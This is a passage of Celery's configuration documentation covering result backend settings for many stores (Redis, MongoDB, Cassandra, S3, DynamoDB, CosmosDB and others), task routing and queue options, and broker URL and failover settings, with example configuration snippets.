``celery.backends.rpc.BacklogLimitExceeded`` if the task tombstone is too *old*. E.g. .. code-block:: python for i in range(10000): r = debug_task.delay() print(r.state) # this would raise celery.backends.rpc.BacklogLimitExceeded .. _conf-cache-result-backend: Cache backend settings ---------------------- .. note:: The cache backend supports the :pypi:`pylibmc` and :pypi:`python-memcached` libraries. The latter is used only if :pypi:`pylibmc` isn't installed. Using a single Memcached server: .. code-block:: python result_backend = 'cache+memcached://127.0.0.1:11211/' Using multiple Memcached servers: .. code-block:: python result_backend = """ cache+memcached://172.19.26.240:11211;172.19.26.242:11211/ """.strip() The "memory" backend stores the cache in memory only: .. code-block:: python result_backend = 'cache' cache_backend = 'memory' .. setting:: cache_backend_options ``cache_backend_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). You can set :pypi:`pylibmc` options using the :setting:`cache_backend_options` setting: .. code-block:: python cache_backend_options = { 'binary': True, 'behaviors': {'tcp_nodelay': True}, } .. setting:: cache_backend ``cache_backend`` ~~~~~~~~~~~~~~~~~ This setting is no longer used in celery's builtin backends as it's now possible to specify the cache backend directly in the :setting:`result_backend` setting. .. 
note:: The :ref:`django-celery-results` library uses ``cache_backend`` for choosing django caches. .. _conf-mongodb-result-backend: MongoDB backend settings ------------------------ .. note:: The MongoDB backend requires the :mod:`pymongo` library: http://github.com/mongodb/mongo-python-driver/tree/master .. setting:: mongodb_backend_settings mongodb_backend_settings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a dict supporting the following keys: * database The database name to connect to. Defaults to ``celery``. * taskmeta_collection The collection name to store task meta data. Defaults to ``celery_taskmeta``. * max_pool_size Passed as max_pool_size to PyMongo's Connection or MongoClient constructor. It is the maximum number of TCP connections to keep open to MongoDB at a given time. If there are more open connections than max_pool_size, sockets will be closed when they are released. Defaults to 10. * options Additional keyword arguments to pass to the mongodb connection constructor. See the :mod:`pymongo` docs to see a list of arguments supported. .. _example-mongodb-result-config: Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'mongodb://localhost:27017/' mongodb_backend_settings = { 'database': 'mydb', 'taskmeta_collection': 'my_taskmeta_collection', } .. _conf-redis-result-backend: Redis backend settings ---------------------- Configuring the backend URL ~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. note:: The Redis backend requires the :pypi:`redis` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[redis] See :ref:`bundles` for information on combining multiple extension requirements. This backend requires the :setting:`result_backend` setting to be set to a Redis or `Redis over TLS`_ URL:: result_backend = 'redis://username:password@host:port/db' .. _`Redis over TLS`: https://www.iana.org/assignments/uri-schemes/prov/rediss For example:: result_backend = 'redis://localhost/0' is the same as:: result_backend = 'redis://' Use the ``rediss://`` protocol to connect to redis over TLS:: result_backend = 'rediss://username:password@host:port/db?ssl_cert_reqs=required' Note that the ``ssl_cert_reqs`` string should be one of ``required``, ``optional``, or ``none`` (though, for backwards compatibility, the string may also be one of ``CERT_REQUIRED``, ``CERT_OPTIONAL``, ``CERT_NONE``). If a Unix socket connection should be used, the URL needs to be in the format::: result_backend = 'socket:///path/to/redis.sock' The fields of the URL are defined as follows: #. ``username`` .. versionadded:: 5.1.0 Username used to connect to the database. Note that this is only supported in Redis>=6.0 and with py-redis>=3.4.0 installed. If you use an older database version or an older client version you can omit the username:: result_backend = 'redis://:password@host:port/db' #. ``password`` Password used to connect to the database. #. ``host`` Host name or IP address of the Redis server (e.g., `localhost`). #. ``port`` Port to the Redis server. Default is 6379. #. ``db`` Database number to use. Default is 0. The db can include an optional leading slash. When using a TLS connection (protocol is ``rediss://``), you may pass in all values in :setting:`broker_use_ssl` as query parameters. Paths to certificates must be URL encoded, and ``ssl_cert_reqs`` is required. Example: .. 
code-block:: python result_backend = 'rediss://:password@host:port/db?\ ssl_cert_reqs=required\ &ssl_ca_certs=%2Fvar%2Fssl%2Fmyca.pem\ # /var/ssl/myca.pem &ssl_certfile=%2Fvar%2Fssl%2Fredis-server-cert.pem\ # /var/ssl/redis-server-cert.pem &ssl_keyfile=%2Fvar%2Fssl%2Fprivate%2Fworker-key.pem' # /var/ssl/private/worker-key.pem Note that the ``ssl_cert_reqs`` string should be one of ``required``, ``optional``, or ``none`` (though, for backwards compatibility, the string may also be one of ``CERT_REQUIRED``, ``CERT_OPTIONAL``, ``CERT_NONE``). .. setting:: redis_backend_health_check_interval .. versionadded:: 5.1.0 ``redis_backend_health_check_interval`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Not configured The Redis backend supports health checks. This value must be set as an integer whose value is the number of seconds between health checks. If a ConnectionError or a TimeoutError is encountered during the health check, the connection will be re-established and the command retried exactly once. .. setting:: redis_backend_use_ssl ``redis_backend_use_ssl`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. The Redis backend supports SSL. This value must be set in the form of a dictionary. The valid key-value pairs are the same as the ones mentioned in the ``redis`` sub-section under :setting:`broker_use_ssl`. .. setting:: redis_max_connections ``redis_max_connections`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: No limit. Maximum number of connections available in the Redis connection pool used for sending and retrieving results. .. warning:: Redis will raise a `ConnectionError` if the number of concurrent connections exceeds the maximum. .. setting:: redis_socket_connect_timeout ``redis_socket_connect_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 4.0.1 Default: :const:`None` Socket timeout for connections to Redis from the result backend in seconds (int/float) .. setting:: redis_socket_timeout ``redis_socket_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: 120.0 seconds. Socket timeout for reading/writing operations to the Redis server in seconds (int/float), used by the redis result backend. .. setting:: redis_retry_on_timeout ``redis_retry_on_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 4.4.1 Default: :const:`False` To retry reading/writing operations on TimeoutError to the Redis server, used by the redis result backend. Shouldn't set this variable if using Redis connection by unix socket. .. setting:: redis_socket_keepalive ``redis_socket_keepalive`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 4.4.1 Default: :const:`False` Socket TCP keepalive to keep connections healthy to the Redis server, used by the redis result backend. .. _conf-cassandra-result-backend: Cassandra backend settings -------------------------- .. note:: This Cassandra backend driver requires :pypi:`cassandra-driver`. To install, use :command:`pip`: .. code-block:: console $ pip install celery[cassandra] See :ref:`bundles` for information on combining multiple extension requirements. This backend requires the following configuration directives to be set. .. setting:: cassandra_servers ``cassandra_servers`` ~~~~~~~~~~~~~~~~~~~~~ Default: ``[]`` (empty list). List of ``host`` Cassandra servers. For example:: cassandra_servers = ['localhost'] .. setting:: cassandra_port ``cassandra_port`` ~~~~~~~~~~~~~~~~~~ Default: 9042. Port to contact the Cassandra servers on. .. setting:: cassandra_keyspace ``cassandra_keyspace`` ~~~~~~~~~~~~~~~~~~~~~~ Default: None. The key-space in which to store the results. 
For example:: cassandra_keyspace = 'tasks_keyspace' .. setting:: cassandra_table ``cassandra_table`` ~~~~~~~~~~~~~~~~~~~ Default: None. The table (column family) in which to store the results. For example:: cassandra_table = 'tasks' .. setting:: cassandra_read_consistency ``cassandra_read_consistency`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: None. The read consistency used. Values can be ``ONE``, ``TWO``, ``THREE``, ``QUORUM``, ``ALL``, ``LOCAL_QUORUM``, ``EACH_QUORUM``, ``LOCAL_ONE``. .. setting:: cassandra_write_consistency ``cassandra_write_consistency`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: None. The write consistency used. Values can be ``ONE``, ``TWO``, ``THREE``, ``QUORUM``, ``ALL``, ``LOCAL_QUORUM``, ``EACH_QUORUM``, ``LOCAL_ONE``. .. setting:: cassandra_entry_ttl ``cassandra_entry_ttl`` ~~~~~~~~~~~~~~~~~~~~~~~ Default: None. Time-to-live for status entries. They expire and are removed that many seconds after being added. A value of :const:`None` (default) means they will never expire. .. setting:: cassandra_auth_provider ``cassandra_auth_provider`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. AuthProvider class within the ``cassandra.auth`` module to use. Values can be ``PlainTextAuthProvider`` or ``SaslAuthProvider``. .. setting:: cassandra_auth_kwargs ``cassandra_auth_kwargs`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). Named arguments to pass into the authentication provider. For example: .. code-block:: python cassandra_auth_kwargs = { 'username': 'cassandra', 'password': 'cassandra' } .. setting:: cassandra_options ``cassandra_options`` ~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). Named arguments to pass into the ``cassandra.cluster`` class. .. code-block:: python cassandra_options = { 'cql_version': '3.2.1', 'protocol_version': 3 } Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python cassandra_servers = ['localhost'] cassandra_keyspace = 'celery' cassandra_table = 'tasks' cassandra_read_consistency = 'ONE' cassandra_write_consistency = 'ONE' cassandra_entry_ttl = 86400 .. _conf-s3-result-backend: S3 backend settings ------------------- .. note:: This S3 backend driver requires :pypi:`s3`. To install, use :command:`pip`: .. code-block:: console $ pip install celery[s3] See :ref:`bundles` for information on combining multiple extension requirements. This backend requires the following configuration directives to be set. .. setting:: s3_access_key_id ``s3_access_key_id`` ~~~~~~~~~~~~~~~~~~~~ Default: None. The S3 access key id. For example:: s3_access_key_id = 'access_key_id' .. setting:: s3_secret_access_key ``s3_secret_access_key`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: None. The S3 secret access key. For example:: s3_secret_access_key = 'access_secret_access_key' .. setting:: s3_bucket ``s3_bucket`` ~~~~~~~~~~~~~ Default: None. The S3 bucket name. For example:: s3_bucket = 'bucket_name' .. setting:: s3_base_path ``s3_base_path`` ~~~~~~~~~~~~~~~~ Default: None. A base path in the S3 bucket to use to store result keys. For example:: s3_base_path = '/prefix' .. setting:: s3_endpoint_url ``s3_endpoint_url`` ~~~~~~~~~~~~~~~~~~~ Default: None. A custom S3 endpoint URL. Use it to connect to a custom self-hosted S3-compatible backend (Ceph, Scality...). For example:: s3_endpoint_url = 'https://.s3.custom.url' .. setting:: s3_region ``s3_region`` ~~~~~~~~~~~~~ Default: None. The S3 AWS region. For example:: s3_region = 'us-east-1' Example configuration ~~~~~~~~~~~~~~~~~~~~~ ..
code-block:: python s3_access_key_id = 's3-access-key-id' s3_secret_access_key = 's3-secret-access-key' s3_bucket = 'mybucket' s3_base_path = '/celery_result_backend' s3_endpoint_url = 'https://endpoint_url' .. _conf-azureblockblob-result-backend: Azure Block Blob backend settings --------------------------------- To use `AzureBlockBlob`_ as the result backend you simply need to configure the :setting:`result_backend` setting with the correct URL. The required URL format is ``azureblockblob://`` followed by the storage connection string. You can find the storage connection string in the ``Access Keys`` pane of your storage account resource in the Azure Portal. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'azureblockblob://DefaultEndpointsProtocol=https;AccountName=somename;AccountKey=Lou...bzg==;EndpointSuffix=core.windows.net' .. setting:: azureblockblob_container_name ``azureblockblob_container_name`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: celery. The name for the storage container in which to store the results. .. setting:: azureblockblob_base_path ``azureblockblob_base_path`` ~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: None. A base path in the storage container to use to store result keys. For example:: azureblockblob_base_path = 'prefix/' .. setting:: azureblockblob_retry_initial_backoff_sec ``azureblockblob_retry_initial_backoff_sec`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 2. The initial backoff interval, in seconds, for the first retry. Subsequent retries are attempted with an exponential strategy. .. setting:: azureblockblob_retry_increment_base ``azureblockblob_retry_increment_base`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 2. .. setting:: azureblockblob_retry_max_attempts ``azureblockblob_retry_max_attempts`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 3. The maximum number of retry attempts. .. setting:: azureblockblob_connection_timeout ``azureblockblob_connection_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 20. Timeout in seconds for establishing the azure block blob connection. .. setting:: azureblockblob_read_timeout ``azureblockblob_read_timeout`` ~~~~~~~~~~~~~~~~~~~~ Default: 120. Timeout in seconds for reading of an azure block blob. .. _conf-elasticsearch-result-backend: Elasticsearch backend settings ------------------------------ To use `Elasticsearch`_ as the result backend you simply need to configure the :setting:`result_backend` setting with the correct URL. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'elasticsearch://example.com:9200/index_name/doc_type' .. setting:: elasticsearch_retry_on_timeout ``elasticsearch_retry_on_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`False` Should timeout trigger a retry on different node? .. setting:: elasticsearch_max_retries ``elasticsearch_max_retries`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 3. Maximum number of retries before an exception is propagated. .. setting:: elasticsearch_timeout ``elasticsearch_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 10.0 seconds. Global timeout,used by the elasticsearch result backend. .. setting:: elasticsearch_save_meta_as_text ``elasticsearch_save_meta_as_text`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`True` Should meta saved as text or as native json. Result is always serialized as text. .. _conf-dynamodb-result-backend: AWS DynamoDB backend settings ----------------------------- .. 
note:: The Dynamodb backend requires the :pypi:`boto3` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[dynamodb] See :ref:`bundles` for information on combining multiple extension requirements. .. warning:: The Dynamodb backend is not compatible with tables that have a sort key defined. If you want to query the results table based on something other than the partition key, please define a global secondary index (GSI) instead. This backend requires the :setting:`result_backend` setting to be set to a DynamoDB URL:: result_backend = 'dynamodb://aws_access_key_id:aws_secret_access_key@region:port/table?read=n&write=m' For example, specifying the AWS region and the table name:: result_backend = 'dynamodb://@us-east-1/celery_results' or retrieving AWS configuration parameters from the environment, using the default table name (``celery``) and specifying read and write provisioned throughput:: result_backend = 'dynamodb://@/?read=5&write=5' or using the `downloadable version `_ of DynamoDB `locally `_:: result_backend = 'dynamodb://@localhost:8000' or using downloadable version or other service with conforming API deployed on any host:: result_backend = 'dynamodb://@us-east-1' dynamodb_endpoint_url = 'http://192.168.0.40:8000' The fields of the DynamoDB URL in ``result_backend`` are defined as follows: #. ``aws_access_key_id & aws_secret_access_key`` The credentials for accessing AWS API resources. These can also be resolved by the :pypi:`boto3` library from various sources, as described `here `_. #. ``region`` The AWS region, e.g. ``us-east-1`` or ``localhost`` for the `Downloadable Version `_. See the :pypi:`boto3` library `documentation `_ for definition options. #. ``port`` The listening port of the local DynamoDB instance, if you are using the downloadable version. If you have not specified the ``region`` parameter as ``localhost``, setting this parameter has **no effect**. #. ``table`` Table name to use. Default is ``celery``. See the `DynamoDB Naming Rules `_ for information on the allowed characters and length. #. ``read & write`` The Read & Write Capacity Units for the created DynamoDB table. Default is ``1`` for both read and write. More details can be found in the `Provisioned Throughput documentation `_. #. ``ttl_seconds`` Time-to-live (in seconds) for results before they expire. The default is to not expire results, while also leaving the DynamoDB table's Time to Live settings untouched. If ``ttl_seconds`` is set to a positive value, results will expire after the specified number of seconds. Setting ``ttl_seconds`` to a negative value means to not expire results, and also to actively disable the DynamoDB table's Time to Live setting. Note that trying to change a table's Time to Live setting multiple times in quick succession will cause a throttling error. More details can be found in the `DynamoDB TTL documentation `_ .. _conf-ironcache-result-backend: IronCache backend settings -------------------------- .. note:: The IronCache backend requires the :pypi:`iron_celery` library: To install this package use :command:`pip`: .. code-block:: console $ pip install iron_celery IronCache is configured via the URL provided in :setting:`result_backend`, for example:: result_backend = 'ironcache://project_id:token@' Or to change the cache name:: ironcache:://project_id:token@/awesomecache For more information, see: https://github.com/iron-io/iron_celery .. _conf-couchbase-result-backend: Couchbase backend settings -------------------------- .. 
note:: The Couchbase backend requires the :pypi:`couchbase` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[couchbase] See :ref:`bundles` for instructions how to combine multiple extension requirements. This backend can be configured via the :setting:`result_backend` set to a Couchbase URL: .. code-block:: python result_backend = 'couchbase://username:password@host:port/bucket' .. setting:: couchbase_backend_settings ``couchbase_backend_settings`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). This is a dict supporting the following keys: * ``host`` Host name of the Couchbase server. Defaults to ``localhost``. * ``port`` The port the Couchbase server is listening to. Defaults to ``8091``. * ``bucket`` The default bucket the Couchbase server is writing to. Defaults to ``default``. * ``username`` User name to authenticate to the Couchbase server as (optional). * ``password`` Password to authenticate to the Couchbase server (optional). .. _conf-arangodb-result-backend: ArangoDB backend settings -------------------------- .. note:: The ArangoDB backend requires the :pypi:`pyArango` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[arangodb] See :ref:`bundles` for instructions how to combine multiple extension requirements. This backend can be configured via the :setting:`result_backend` set to a ArangoDB URL: .. code-block:: python result_backend = 'arangodb://username:password@host:port/database/collection' .. setting:: arangodb_backend_settings ``arangodb_backend_settings`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). This is a dict supporting the following keys: * ``host`` Host name of the ArangoDB server. Defaults to ``localhost``. * ``port`` The port the ArangoDB server is listening to. Defaults to ``8529``. * ``database`` The default database in the ArangoDB server is writing to. Defaults to ``celery``. * ``collection`` The default collection in the ArangoDB servers database is writing to. Defaults to ``celery``. * ``username`` User name to authenticate to the ArangoDB server as (optional). * ``password`` Password to authenticate to the ArangoDB server (optional). * ``http_protocol`` HTTP Protocol in ArangoDB server connection. Defaults to ``http``. * ``verify`` HTTPS Verification check while creating the ArangoDB connection. Defaults to ``False``. .. _conf-cosmosdbsql-result-backend: CosmosDB backend settings (experimental) ---------------------------------------- To use `CosmosDB`_ as the result backend, you simply need to configure the :setting:`result_backend` setting with the correct URL. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'cosmosdbsql://:{InsertAccountPrimaryKeyHere}@{InsertAccountNameHere}.documents.azure.com' .. setting:: cosmosdbsql_database_name ``cosmosdbsql_database_name`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: celerydb. The name for the database in which to store the results. .. setting:: cosmosdbsql_collection_name ``cosmosdbsql_collection_name`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: celerycol. The name of the collection in which to store the results. .. setting:: cosmosdbsql_consistency_level ``cosmosdbsql_consistency_level`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Session. Represents the consistency levels supported for Azure Cosmos DB client operations. Consistency levels by order of strength are: Strong, BoundedStaleness, Session, ConsistentPrefix and Eventual. .. 
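As an illustration, a minimal sketch combining the CosmosDB settings described above (the account placeholders are taken from the example URL; the remaining values are simply the documented defaults):

.. code-block:: python

    result_backend = 'cosmosdbsql://:{InsertAccountPrimaryKeyHere}@{InsertAccountNameHere}.documents.azure.com'

    cosmosdbsql_database_name = 'celerydb'
    cosmosdbsql_collection_name = 'celerycol'
    cosmosdbsql_consistency_level = 'Session'

..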
setting:: cosmosdbsql_max_retry_attempts ``cosmosdbsql_max_retry_attempts`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 9. Maximum number of retries to be performed for a request. .. setting:: cosmosdbsql_max_retry_wait_time ``cosmosdbsql_max_retry_wait_time`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 30. Maximum wait time in seconds to wait for a request while the retries are happening. .. _conf-couchdb-result-backend: CouchDB backend settings ------------------------ .. note:: The CouchDB backend requires the :pypi:`pycouchdb` library: To install this Couchbase package use :command:`pip`: .. code-block:: console $ pip install celery[couchdb] See :ref:`bundles` for information on combining multiple extension requirements. This backend can be configured via the :setting:`result_backend` set to a CouchDB URL:: result_backend = 'couchdb://username:password@host:port/container' The URL is formed out of the following parts: * ``username`` User name to authenticate to the CouchDB server as (optional). * ``password`` Password to authenticate to the CouchDB server (optional). * ``host`` Host name of the CouchDB server. Defaults to ``localhost``. * ``port`` The port the CouchDB server is listening to. Defaults to ``8091``. * ``container`` The default container the CouchDB server is writing to. Defaults to ``default``. .. _conf-filesystem-result-backend: File-system backend settings ---------------------------- This backend can be configured using a file URL, for example:: CELERY_RESULT_BACKEND = 'file:///var/celery/results' The configured directory needs to be shared and writable by all servers using the backend. If you're trying Celery on a single system you can simply use the backend without any further configuration. For larger clusters you could use NFS, `GlusterFS`_, CIFS, `HDFS`_ (using FUSE), or any other file-system. .. _`GlusterFS`: http://www.gluster.org/ .. _`HDFS`: http://hadoop.apache.org/ .. _conf-consul-result-backend: Consul K/V store backend settings --------------------------------- .. note:: The Consul backend requires the :pypi:`python-consul2` library: To install this package use :command:`pip`: .. code-block:: console $ pip install python-consul2 The Consul backend can be configured using a URL, for example:: CELERY_RESULT_BACKEND = 'consul://localhost:8500/' or:: result_backend = 'consul://localhost:8500/' The backend will store results in the K/V store of Consul as individual keys. The backend supports auto expire of results using TTLs in Consul. The full syntax of the URL is:: consul://host:port[?one_client=1] The URL is formed out of the following parts: * ``host`` Host name of the Consul server. * ``port`` The port the Consul server is listening to. * ``one_client`` By default, for correctness, the backend uses a separate client connection per operation. In cases of extreme load, the rate of creation of new connections can cause HTTP 429 "too many connections" error responses from the Consul server when under load. The recommended way to handle this is to enable retries in ``python-consul2`` using the patch at https://github.com/poppyred/python-consul2/pull/31. Alternatively, if ``one_client`` is set, a single client connection will be used for all operations instead. This should eliminate the HTTP 429 errors, but the storage of results in the backend can become unreliable. .. _conf-messaging: Message Routing --------------- .. _conf-messaging-routing: .. 
setting:: task_queues ``task_queues`` ~~~~~~~~~~~~~~~ Default: :const:`None` (queue taken from default queue settings). Most users will not want to specify this setting and should rather use the :ref:`automatic routing facilities `. If you really want to configure advanced routing, this setting should be a list of :class:`kombu.Queue` objects the worker will consume from. Note that this setting can be overridden for a worker via the :option:`-Q ` option, or individual queues from this list (by name) can be excluded using the :option:`-X ` option. Also see :ref:`routing-basics` for more information. The default is a queue/exchange/binding key of ``celery``, with exchange type ``direct``. See also :setting:`task_routes`. .. setting:: task_routes ``task_routes`` ~~~~~~~~~~~~~~~ Default: :const:`None`. A list of routers, or a single router used to route tasks to queues. When deciding the final destination of a task the routers are consulted in order. A router can be specified as either: * A function with the signature ``(name, args, kwargs, options, task=None, **kwargs)`` * A string providing the path to a router function. * A dict containing router specification: Will be converted to a :class:`celery.routes.MapRoute` instance. * A list of ``(pattern, route)`` tuples: Will be converted to a :class:`celery.routes.MapRoute` instance. Examples: .. code-block:: python task_routes = { 'celery.ping': 'default', 'mytasks.add': 'cpu-bound', 'feed.tasks.*': 'feeds', # <-- glob pattern re.compile(r'(image|video)\.tasks\..*'): 'media', # <-- regex 'video.encode': { 'queue': 'video', 'exchange': 'media', 'routing_key': 'media.video.encode', }, } task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default'}) Where ``myapp.tasks.route_task`` could be: .. code-block:: python def route_task(name, args, kwargs, options, task=None, **kw): if name == 'celery.ping': return {'queue': 'default'} ``route_task`` may return a string or a dict. A string then means it's a queue name in :setting:`task_queues`, a dict means it's a custom route. When sending tasks, the routers are consulted in order. The first router that doesn't return ``None`` is the route to use. The message options are then merged with the found route settings, where the task's settings have priority. For example, if :func:`~celery.execute.apply_async` has these arguments: .. code-block:: python Task.apply_async(immediate=False, exchange='video', routing_key='video.compress') and a router returns: .. code-block:: python {'immediate': True, 'exchange': 'urgent'} the final message options will be: .. code-block:: python immediate=False, exchange='video', routing_key='video.compress' (and any default message options defined in the :class:`~celery.app.task.Task` class) Values defined in :setting:`task_routes` have precedence over values defined in :setting:`task_queues` when merging the two. With the following settings: .. code-block:: python task_queues = { 'cpubound': { 'exchange': 'cpubound', 'routing_key': 'cpubound', }, } task_routes = { 'tasks.add': { 'queue': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json', }, } The final routing options for ``tasks.add`` will become: .. code-block:: javascript {'exchange': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json'} See :ref:`routers` for more examples. .. setting:: task_queue_max_priority ``task_queue_max_priority`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :brokers: RabbitMQ Default: :const:`None`. See :ref:`routing-options-rabbitmq-priorities`. ..
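For instance, a minimal sketch enabling priority support on RabbitMQ queues via these settings (the numbers are arbitrary; ``task_default_priority`` is described next):

.. code-block:: python

    # Declare queues that support priorities 0-10 ...
    task_queue_max_priority = 10
    # ... and give tasks a middle priority unless they set their own.
    task_default_priority = 5

..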
setting:: task_default_priority ``task_default_priority`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :brokers: RabbitMQ, Redis Default: :const:`None`. See :ref:`routing-options-rabbitmq-priorities`. .. setting:: task_inherit_parent_priority ``task_inherit_parent_priority`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :brokers: RabbitMQ Default: :const:`False`. If enabled, child tasks will inherit priority of the parent task. .. code-block:: python # The last task in chain will also have priority set to 5. chain = celery.chain(add.s(2) | add.s(2).set(priority=5) | add.s(3)) Priority inheritance also works when calling child tasks from a parent task with `delay` or `apply_async`. See :ref:`routing-options-rabbitmq-priorities`. .. setting:: worker_direct ``worker_direct`` ~~~~~~~~~~~~~~~~~ Default: Disabled. This option enables so that every worker has a dedicated queue, so that tasks can be routed to specific workers. The queue name for each worker is automatically generated based on the worker hostname and a ``.dq`` suffix, using the ``C.dq`` exchange. For example the queue name for the worker with node name ``w1@example.com`` becomes:: w1@example.com.dq Then you can route the task to the task by specifying the hostname as the routing key and the ``C.dq`` exchange:: task_routes = { 'tasks.add': {'exchange': 'C.dq', 'routing_key': 'w1@example.com'} } .. setting:: task_create_missing_queues ``task_create_missing_queues`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled. If enabled (default), any queues specified that aren't defined in :setting:`task_queues` will be automatically created. See :ref:`routing-automatic`. .. setting:: task_default_queue ``task_default_queue`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celery"``. The name of the default queue used by `.apply_async` if the message has no route or no custom queue has been specified. This queue must be listed in :setting:`task_queues`. If :setting:`task_queues` isn't specified then it's automatically created containing one queue entry, where this name is used as the name of that queue. .. seealso:: :ref:`routing-changing-default-queue` .. setting:: task_default_exchange ``task_default_exchange`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Uses the value set for :setting:`task_default_queue`. Name of the default exchange to use when no custom exchange is specified for a key in the :setting:`task_queues` setting. .. setting:: task_default_exchange_type ``task_default_exchange_type`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"direct"``. Default exchange type used when no custom exchange type is specified for a key in the :setting:`task_queues` setting. .. setting:: task_default_routing_key ``task_default_routing_key`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Uses the value set for :setting:`task_default_queue`. The default routing key used when no custom routing key is specified for a key in the :setting:`task_queues` setting. .. setting:: task_default_delivery_mode ``task_default_delivery_mode`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"persistent"``. Can be `transient` (messages not written to disk) or `persistent` (written to disk). .. _conf-broker-settings: Broker Settings --------------- .. setting:: broker_url ``broker_url`` ~~~~~~~~~~~~~~ Default: ``"amqp://"`` Default broker URL. This must be a URL in the form of:: transport://userid:password@hostname:port/virtual_host Only the scheme part (``transport://``) is required, the rest is optional, and defaults to the specific transports default values. 
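For example, a minimal sketch assuming a RabbitMQ broker on the local machine (the credentials and virtual host are placeholders):

.. code-block:: python

    # Fully spelled out ...
    broker_url = 'amqp://myuser:mypassword@localhost:5672/myvhost'

    # ... or rely on the transport defaults and give only the scheme.
    broker_url = 'amqp://'
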
The transport part is the broker implementation to use, and the default is ``amqp``, (uses ``librabbitmq`` if installed or falls back to ``pyamqp``). There are also other choices available, including; ``redis://``, ``sqs://``, and ``qpid://``. The scheme can also be a fully qualified path to your own transport implementation:: broker_url = 'proj.transports.MyTransport://localhost' More than one broker URL, of the same transport, can also be specified. The broker URLs can be passed in as a single string that's semicolon delimited:: broker_url = 'transport://userid:password@hostname:port//;transport://userid:password@hostname:port//' Or as a list:: broker_url = [ 'transport://userid:password@localhost:port//', 'transport://userid:password@hostname:port//' ] The brokers will then be used in the :setting:`broker_failover_strategy`. See :ref:`kombu:connection-urls` in the Kombu documentation for more information. .. setting:: broker_read_url .. setting:: broker_write_url ``broker_read_url`` / ``broker_write_url`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Taken from :setting:`broker_url`. These settings can be configured, instead of :setting:`broker_url` to specify different connection parameters for broker connections used for consuming and producing. Example:: broker_read_url = 'amqp://user:pass@broker.example.com:56721' broker_write_url = 'amqp://user:pass@broker.example.com:56722' Both options can also be specified as a list for failover alternates, see :setting:`broker_url` for more information. .. setting:: broker_failover_strategy ``broker_failover_strategy`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"round-robin"``. Default failover strategy for the broker Connection object. If supplied, may map to a key in 'kombu.connection.failover_strategies', or be a reference to any method that yields a single item from a supplied list. Example:: # Random failover strategy def random_failover_strategy(servers): it = list(servers) # don't modify callers list shuffle = random.shuffle for _ in repeat(None): shuffle(it) yield it[0] broker_failover_strategy = random_failover_strategy .. setting:: broker_heartbeat ``broker_heartbeat`` ~~~~~~~~~~~~~~~~~~~~ :transports supported: ``pyamqp`` Default: ``120.0`` (negotiated by server). Note: This value is only used by the worker, clients do not use a heartbeat at the moment. It's not always possible to detect connection loss in a timely manner using TCP/IP 